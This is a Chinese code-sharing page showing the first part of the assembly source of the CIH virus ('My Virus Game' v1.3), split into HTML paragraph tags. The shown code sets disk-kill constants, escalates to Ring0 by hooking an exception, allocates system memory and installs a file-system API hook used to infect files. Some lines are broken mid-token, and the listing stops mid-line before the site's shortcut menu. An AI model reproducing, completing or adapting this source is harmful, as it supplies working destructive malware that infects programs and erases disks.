cih源代码.htm
来自「CIH源代码」· HTM 代码 · 共 1,695 行 · 第 1/5 页
HTM
1,695 行
<P>db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h</P>
<P>db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>dd 00000000h, VirusSize</P>
<P> </P>
<P>OriginalAppEXE ENDS</P>
<P> </P>
<P>;
****************************************************************************</P>
<P>; * My Virus Game *</P>
<P>;
****************************************************************************</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * Constant Define *</P>
<P>; *********************************************************</P>
<P> </P>
<P>TRUE = 1</P>
<P>FALSE = 0</P>
<P> </P>
<P>DEBUG = TRUE</P>
<P> </P>
<P>MajorVirusVersion = 1</P>
<P>MinorVirusVersion = 3</P>
<P> </P>
<P>VirusVersion = MajorVirusVersion*10h+MinorVirusVersion</P>
<P> </P>
<P> </P>
<P>IF DEBUG</P>
<P> </P>
<P>FirstKillHardDiskNumber = 81h</P>
<P>HookExceptionNumber = 05h</P>
<P> </P>
<P>ELSE</P>
<P> </P>
<P>FirstKillHardDiskNumber = 80h</P>
<P>HookExceptionNumber = 03h</P>
<P> </P>
<P>ENDIF</P>
<P> </P>
<P> </P>
<P>FileNameBufferSize = 7fh</P>
<P> </P>
<P>; *********************************************************</P>
<P>; *********************************************************</P>
<P> </P>
<P>VirusGame SEGMENT</P>
<P> </P>
<P>ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame</P>
<P>ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * Ring3 Virus Game Initial Program *</P>
<P>; *********************************************************</P>
<P> </P>
<P>MyVirusStart:</P>
<P>push ebp</P>
<P> </P>
<P>; *************************************</P>
<P>; * Let's Modify Structured Exception *</P>
<P>; * Handing, Prevent Exception Error *</P>
<P>; * Occurrence, Especially in NT. *</P>
<P>; *************************************</P>
<P> </P>
<P>lea eax, [esp-04h*2]</P>
<P> </P>
<P>xor ebx, ebx</P>
<P>xchg eax, fs:[ebx]</P>
<P> </P>
<P>call @0</P>
<P>@0:</P>
<P>pop ebx</P>
<P> </P>
<P>lea ecx, StopToRunVirusCode-@0[ebx]</P>
<P>push ecx</P>
<P> </P>
<P>push eax</P>
<P> </P>
<P>; *************************************</P>
<P>; * Let's Modify *</P>
<P> </P>
<P>pop esi</P>
<P> </P>
<P>; *************************************</P>
<P>; * Generate Exception to Get Ring0 *</P>
<P>; *************************************</P>
<P> </P>
<P>int HookExceptionNumber ; GenerateException</P>
<P>ReturnAddressOfEndException = $</P>
<P> </P>
<P>; *************************************</P>
<P>; * Merge All Virus Code Section *</P>
<P>; *************************************</P>
<P> </P>
<P>push esi</P>
<P>mov esi, eax</P>
<P> </P>
<P>LoopOfMergeAllVirusCodeSection:</P>
<P> </P>
<P>mov ecx, [eax-04h]</P>
<P> </P>
<P>rep movsb</P>
<P> </P>
<P>sub eax, 08h</P>
<P> </P>
<P>mov esi, [eax]</P>
<P> </P>
<P>or esi, esi</P>
<P>jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1</P>
<P> </P>
<P>jmp LoopOfMergeAllVirusCodeSection</P>
<P> </P>
<P>QuitLoopOfMergeAllVirusCodeSection:</P>
<P> </P>
<P>pop esi</P>
<P> </P>
<P>; *************************************</P>
<P>; * Generate Exception Again *</P>
<P>; *************************************</P>
<P> </P>
<P>int HookExceptionNumber ; GenerateException Aga</P>
<P> </P>
<P> </P>
<P>; *************************************</P>
<P>; * Let's Restore *</P>
<P>; * Structured Exception Handing *</P>
<P>; *************************************</P>
<P> </P>
<P>ReadyRestoreSE:</P>
<P>sti</P>
<P> </P>
<P>xor ebx, ebx</P>
<P> </P>
<P>jmp RestoreSE</P>
<P> </P>
<P>; *************************************</P>
<P>; * When Exception Error Occurs, *</P>
<P>; * Our OS System should be in NT. *</P>
<P>; * So My Cute Virus will not *</P>
<P>; * Continue to Run, it Jmups to *</P>
<P>; * Original Application to Run. *</P>
<P>; *************************************</P>
<P> </P>
<P>StopToRunVirusCode:</P>
<P>@1 = StopToRunVirusCode</P>
<P> </P>
<P>xor ebx, ebx</P>
<P>mov eax, fs:[ebx]</P>
<P>mov esp, [eax]</P>
<P> </P>
<P>RestoreSE:</P>
<P>pop dword ptr fs:[ebx]</P>
<P>pop eax</P>
<P> </P>
<P>; *************************************</P>
<P>; * Return Original App to Execute *</P>
<P>; *************************************</P>
<P> </P>
<P>pop ebp</P>
<P> </P>
<P>push 00401000h ; Push Original</P>
<P>OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack</P>
<P> </P>
<P>ret ; Return to Original App Entry Point</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * Ring0 Virus Game Initial Program *</P>
<P>; *********************************************************</P>
<P> </P>
<P>MyExceptionHook:</P>
<P>@2 = MyExceptionHook</P>
<P> </P>
<P>jz InstallMyFileSystemApiHook</P>
<P> </P>
<P>; *************************************</P>
<P>; * Do My Virus Exist in System !? *</P>
<P>; *************************************</P>
<P> </P>
<P>mov ecx, dr0</P>
<P>jecxz AllocateSystemMemoryPage</P>
<P> </P>
<P>add dword ptr [esp], ReadyRestoreSE-ReturnAddressOf</P>
<P>dException</P>
<P> </P>
<P>; *************************************</P>
<P>; * Return to Ring3 Initial Program *</P>
<P>; *************************************</P>
<P> </P>
<P>ExitRing0Init:</P>
<P>mov [ebx-04h], bp ;</P>
<P>shr ebp, 16 ; Restore Exception</P>
<P>mov [ebx+02h], bp ;</P>
<P> </P>
<P>iretd</P>
<P> </P>
<P>; *************************************</P>
<P>; * Allocate SystemMemory Page to Use *</P>
<P>; *************************************</P>
<P> </P>
<P>AllocateSystemMemoryPage:</P>
<P> </P>
<P>mov dr0, ebx ; Set the Mark of My Virus Exis</P>
<P>in System</P>
<P> </P>
<P>push 00000000fh ;</P>
<P>push ecx ;</P>
<P>push 0ffffffffh ;</P>
<P>push ecx ;</P>
<P>push ecx ;</P>
<P>push ecx ;</P>
<P>push 000000001h ;</P>
<P>push 000000002h ;</P>
<P>int 20h ; VMMCALL _PageAllocate</P>
<P>_PageAllocate = $ ;</P>
<P>dd 00010053h ; Use EAX, ECX, EDX, and flags</P>
<P>add esp, 08h*04h</P>
<P> </P>
<P>xchg edi, eax ; EDI = SystemMemory Start Addr</P>
<P>s</P>
<P> </P>
<P>lea eax, MyVirusStart-@2[esi]</P>
<P> </P>
<P>iretd ; Return to Ring3 Initial Program</P>
<P> </P>
<P>; *************************************</P>
<P>; * Install My File System Api Hook *</P>
<P>; *************************************</P>
<P> </P>
<P>InstallMyFileSystemApiHook:</P>
<P> </P>
<P>lea eax, FileSystemApiHook-@6[edi]</P>
<P> </P>
<P>push eax ;</P>
<P>int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook</P>
<P>IFSMgr_InstallFileSystemApiHook = $ ;</P>
<P>dd 00400067h ; Use EAX, ECX, EDX, and flags</P>
<P> </P>
<P>mov dr0, eax ; Save OldFileSystemApiHook Add</P>
<P>ss</P>
<P> </P>
<P>pop eax ; EAX = FileSystemApiHook Address</P>
<P> </P>
<P>; Save Old IFSMgr_InstallFileSystemApiHook Entry Point</P>
<P>mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]</P>
<P>mov edx, [ecx]</P>
<P>mov OldInstallFileSystemApiHook-@3[eax], edx</P>
<P> </P>
<P>; Modify IFSMgr_InstallFileSystemApiHook Entry Point</P>
<P>lea eax, InstallFileSystemApiHook-@3[eax]</P>
<P>mov [ecx], eax</P>
<P> </P>
<P>cli</P>
<P> </P>
<P>jmp ExitRing0Init</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * Code Size of Merge Virus Code Section *</P>
<P>; *********************************************************</P>
<P> </P>
<P>CodeSizeOfMergeVirusCodeSection = offset $</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * IFSMgr_InstallFileSystemApiHook *</P>
<P>; *********************************************************</P>
<P> </P>
<P>InstallFileSystemApiHook:</P>
<P>push ebx</P>
<P> </P>
<P>call @4 ;</P>
<P>@4: ;</P>
<P>pop ebx ; mov ebx, offset FileSystemApiHook</P>
<P>add ebx, FileSystemApiHook-@4 ;</P>
<P> </P>
<P>push ebx</P>
<P>int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook</P>
<P>IFSMgr_RemoveFileSystemApiHook = $</P>
<P>dd 00400068h ; Use EAX, ECX, EDX, and flags</P>
<P>pop eax</P>
<P> </P>
<P>; Call Original IFSMgr_InstallFileSystemApiHook</P>
<P>; to Link Client FileSystemApiHook</P>
<P>push dword ptr [esp+8]</P>
<P>call OldInstallFileSystemApiHook-@3[ebx]</P>
<P>pop ecx</P>
<P> </P>
<P>push eax</P>
<P> </P>
<P>; Call Original IFSMgr_InstallFileSystemApiHook</P>
<P>; to Link My FileSystemApiHook</P>
<P>push ebx</P>
<P>call OldInstallFileSystemApiHook-@3[ebx]</P>
<P>pop ecx</P>
<P> </P>
<P>mov dr0, eax ; Adjust OldFileSystemApiHook A</P>
<P>ress</P>
<P> </P>
<P>pop eax</P>
<P> </P>
<P>pop ebx</P>
<P> </P>
<P>ret</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * Static Data *</P>
<P>; *********************************************************</P>
<P> </P>
<P>OldInstallFileSystemApiHook dd ?</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * IFSMgr_FileSystemHook *</P>
<P>; *********************************************************</P>
<P> </P>
<P>; *************************************</P>
<P>; * IFSMgr_FileSystemHook Entry Point *</P>
<P>; *************************************</P>
<P> </P>
<P>FileSystemApiHook:</P>
<P>@3 = FileSystemApiHook</P>
<P> </P>
<P>pushad</P>
<P> </P>
<P>call @5 ;</P>
<P>@5: ;</P>
<P>pop esi ; mov esi, offset VirusGameDataSta⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?